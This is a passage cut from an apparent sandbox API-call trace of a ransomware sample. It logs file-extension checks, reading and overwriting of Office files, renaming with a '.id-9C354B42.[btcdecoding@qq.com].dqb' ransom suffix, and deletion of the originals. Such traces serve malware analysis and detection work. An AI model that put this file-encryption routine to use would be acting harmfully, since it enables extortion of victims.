(lpString1=".pdf", lpString2=".xml") returned -1 [0037.211] lstrlenW (lpString=".xls") returned 4 [0037.211] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.211] lstrlenW (lpString=".xlsx") returned 5 [0037.211] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0037.211] lstrlenW (lpString=".ppt") returned 4 [0037.211] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.211] lstrlenW (lpString=".zip") returned 4 [0037.211] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.211] lstrlenW (lpString=".rar") returned 4 [0037.211] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".bz2") returned 4 [0037.212] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".7z") returned 3 [0037.212] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.212] lstrlenW (lpString=".dbf") returned 4 [0037.212] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.212] lstrlenW (lpString=".1cd") returned 4 [0037.212] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.212] lstrlenW (lpString=".jpg") returned 4 [0037.212] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.212] lstrlenW (lpString=".doc") returned 4 [0037.212] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".docx") returned 5 [0037.212] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0037.212] lstrlenW (lpString=".pdf") returned 4 [0037.212] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".xls") returned 4 [0037.212] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".xlsx") returned 5 [0037.212] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0037.212] lstrlenW (lpString=".ppt") returned 4 [0037.212] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.212] lstrlenW (lpString=".zip") returned 4 [0037.212] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.212] lstrlenW (lpString=".rar") returned 4 [0037.212] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".bz2") returned 4 [0037.212] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.212] lstrlenW (lpString=".7z") returned 3 [0037.213] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.213] lstrlenW (lpString=".dbf") returned 4 [0037.213] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.213] lstrlenW (lpString=".1cd") returned 4 [0037.213] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.213] lstrlenW (lpString=".jpg") returned 4 [0037.213] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.213] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.213] lstrlenW (lpString="ipsnor.xml") returned 10 [0037.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.213] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2580) returned 1 [0037.214] CloseHandle (hObject=0x180) returned 1 [0037.214] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0x20 [0037.214] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.214] lstrlenW (lpString=".doc") returned 4 [0037.214] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.214] lstrlenW (lpString=".docx") returned 5 [0037.214] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0037.214] lstrlenW (lpString=".pdf") returned 4 [0037.214] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.214] lstrlenW (lpString=".xls") returned 4 [0037.214] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.214] lstrlenW (lpString=".xlsx") returned 5 [0037.214] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0037.214] lstrlenW (lpString=".ppt") returned 4 [0037.214] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.214] lstrlenW (lpString=".zip") returned 4 [0037.214] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.214] lstrlenW (lpString=".rar") returned 4 [0037.214] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.214] lstrlenW (lpString=".bz2") returned 4 [0037.214] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.214] lstrlenW (lpString=".7z") returned 3 [0037.214] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.214] lstrlenW (lpString=".dbf") returned 4 [0037.215] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString=".1cd") returned 4 [0037.215] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString=".jpg") returned 4 [0037.215] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString=".doc") returned 4 [0037.215] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString=".docx") returned 5 [0037.215] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0037.215] lstrlenW (lpString=".pdf") returned 4 [0037.215] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString=".xls") returned 4 [0037.215] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString=".xlsx") returned 5 [0037.215] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0037.215] lstrlenW (lpString=".ppt") returned 4 [0037.215] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString=".zip") returned 4 [0037.215] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.215] lstrlenW (lpString=".rar") returned 4 [0037.215] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString=".bz2") returned 4 [0037.215] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString=".7z") returned 3 [0037.215] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString=".dbf") returned 4 [0037.215] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.215] lstrlenW (lpString=".1cd") returned 4 [0037.216] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0037.216] lstrlenW (lpString=".jpg") returned 4 [0037.216] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.216] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.216] lstrlenW (lpString="ipsplk.xml") returned 10 [0037.216] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.217] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2600) returned 1 [0037.217] CloseHandle (hObject=0x180) returned 1 [0037.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0x20 [0037.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0037.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0037.217] lstrlenW (lpString=".doc") returned 4 [0037.217] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.217] lstrlenW (lpString=".docx") returned 5 [0037.217] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0037.217] lstrlenW (lpString=".pdf") returned 4 [0037.217] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.217] lstrlenW (lpString=".xls") returned 4 [0037.217] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.217] lstrlenW (lpString=".xlsx") returned 5 [0037.217] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0037.217] lstrlenW (lpString=".ppt") returned 4 [0037.217] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0037.217] lstrlenW (lpString=".zip") returned 4 [0037.217] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.217] lstrlenW (lpString=".rar") returned 4 [0037.217] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.217] lstrlenW (lpString=".bz2") returned 4 [0037.217] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.217] lstrlenW (lpString=".7z") returned 3 [0037.218] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0037.218] lstrlenW (lpString=".dbf") returned 4 [0037.218] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.221] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0037.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.366] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.366] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.366] ReadFile (in: hFile=0x180, lpBuffer=0x3760058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c7fc38, lpOverlapped=0x0 | out: lpBuffer=0x3760058*, lpNumberOfBytesRead=0x2c7fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.370] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.370] ReadFile (in: hFile=0x180, lpBuffer=0x37a0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c7fc38, lpOverlapped=0x0 | out: lpBuffer=0x37a0058*, lpNumberOfBytesRead=0x2c7fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.373] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2c7fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.373] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.373] ReadFile (in: hFile=0x180, lpBuffer=0x37e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c7fc38, lpOverlapped=0x0 | out: lpBuffer=0x37e0058*, lpNumberOfBytesRead=0x2c7fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.774] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.774] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2c7fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0037.796] SetEndOfFile (hFile=0x180) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fea4f0 [0037.796] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.796] WriteFile (in: hFile=0x180, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c7fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x2c7fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.798] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.798] WriteFile (in: hFile=0x180, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c7fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x2c7fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.800] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.800] WriteFile (in: hFile=0x180, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c7fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x2c7fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.802] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0037.805] CloseHandle (hObject=0x180) returned 1 [0038.565] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.566] lstrlenW (lpString=".doc") returned 4 [0038.566] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString=".docx") returned 5 [0038.566] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0038.566] lstrlenW (lpString=".pdf") returned 4 [0038.566] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString=".xls") returned 4 [0038.566] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString=".xlsx") returned 5 [0038.566] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0038.566] lstrlenW (lpString=".ppt") returned 4 [0038.566] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.566] lstrlenW (lpString=".zip") returned 4 [0038.566] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString=".rar") returned 4 [0038.566] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString=".bz2") returned 4 [0038.566] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.566] lstrlenW (lpString=".7z") returned 3 [0038.566] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.566] lstrlenW (lpString=".dbf") returned 4 [0038.566] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.566] lstrlenW (lpString=".1cd") returned 4 [0038.566] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.566] lstrlenW (lpString=".jpg") returned 4 [0038.566] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.567] lstrlenW (lpString=".doc") returned 4 [0038.567] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString=".docx") returned 5 [0038.567] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0038.567] lstrlenW (lpString=".pdf") returned 4 [0038.567] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString=".xls") returned 4 [0038.567] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString=".xlsx") returned 5 [0038.567] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0038.567] lstrlenW (lpString=".ppt") returned 4 [0038.567] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.567] lstrlenW (lpString=".zip") returned 4 [0038.567] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString=".rar") returned 4 [0038.567] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString=".bz2") returned 4 [0038.567] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.567] lstrlenW (lpString=".7z") returned 3 [0038.567] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.567] lstrlenW (lpString=".dbf") returned 4 [0038.567] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.567] lstrlenW (lpString=".1cd") returned 4 [0038.567] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0038.567] lstrlenW (lpString=".jpg") returned 4 [0038.567] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.567] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0038.568] lstrlenW (lpString="PSS10O.CHM") returned 10 [0038.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0038.795] GetFileSizeEx (in: hFile=0x1e0, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=26929) returned 1 [0038.795] CloseHandle (hObject=0x1e0) returned 1 [0038.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 0x20 [0038.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0038.806] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.806] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0038.826] GetLastError () returned 0x0 [0038.826] ReadFile (in: hFile=0x1e0, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x6931, lpOverlapped=0x0) returned 1 [0038.855] WriteFile (in: hFile=0x1e4, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x6940, lpOverlapped=0x0) returned 1 [0038.856] ReadFile (in: hFile=0x1e0, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.856] WriteFile (in: hFile=0x1e4, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0038.856] SetEndOfFile (hFile=0x1e4) returned 1 [0038.856] CloseHandle (hObject=0x1e4) returned 1 [0038.857] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.857] SetEndOfFile (hFile=0x1e0) returned 1 [0038.858] CloseHandle (hObject=0x1e0) returned 1 [0038.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.858] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 